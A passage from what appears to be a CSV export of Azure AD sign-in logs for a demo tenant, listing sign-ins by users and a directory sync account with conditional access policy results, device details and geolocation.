'5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",46ab66bf-13d5-46c8-a514-03b7399c0e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,46ab66bf-13d5-46c8-a514-03b7399c0e00,SigninLogs,Sucess,50.6406517,5.572050095
+1488,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:11.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f6079699-5b15-458c-90c0-6a0bb4817a0d,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",231a1112-0bf5-4aba-9d7a-10563d1a1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,231a1112-0bf5-4aba-9d7a-10563d1a1000,SigninLogs,Sucess,36.6404686,-78.26995087
+1489,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:12.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,37f307ba-3566-4c52-8c62-9021b7516ae2,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 10:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",88cadf22-86a5-4f87-805f-6b28e01f0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,88cadf22-86a5-4f87-805f-6b28e01f0f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1490,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:17.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7e0d34cf-4ff5-4ad5-bf56-4c3791d2f728,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",268d392c-7163-4a17-b774-5f4f4b100f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,268d392c-7163-4a17-b774-5f4f4b100f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1491,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:51.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:30,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0aa4716b-db4f-4af3-adf5-86eaf9fa0e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0aa4716b-db4f-4af3-adf5-86eaf9fa0e00,SigninLogs,Sucess,50.6406517,5.572050095
+1492,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:46.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,62585628-4f7f-4af6-989e-6209bf780bd1,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,App Service,7ab7862c-4c57-491e-8a45-d52a7e023983,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 09:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ace1d4a5-fd0b-463d-bfa6-011c02351000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ace1d4a5-fd0b-463d-bfa6-011c02351000,SigninLogs,Sucess,50.6406517,5.572050095
+1493,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:47.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 10:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",8969890b-8dab-4887-9be7-54efda341000,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8969890b-8dab-4887-9be7-54efda341000,SigninLogs,Sucess,51.4458313,-0.969720006
+1494,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:51.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:30,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0aa4716b-db4f-4af3-adf5-86eaf9fa0e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0aa4716b-db4f-4af3-adf5-86eaf9fa0e00,SigninLogs,Sucess,50.6406517,5.572050095
+1495,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:25.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,735ed2c2-d34c-4a00-b449-b5af2c29d962,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 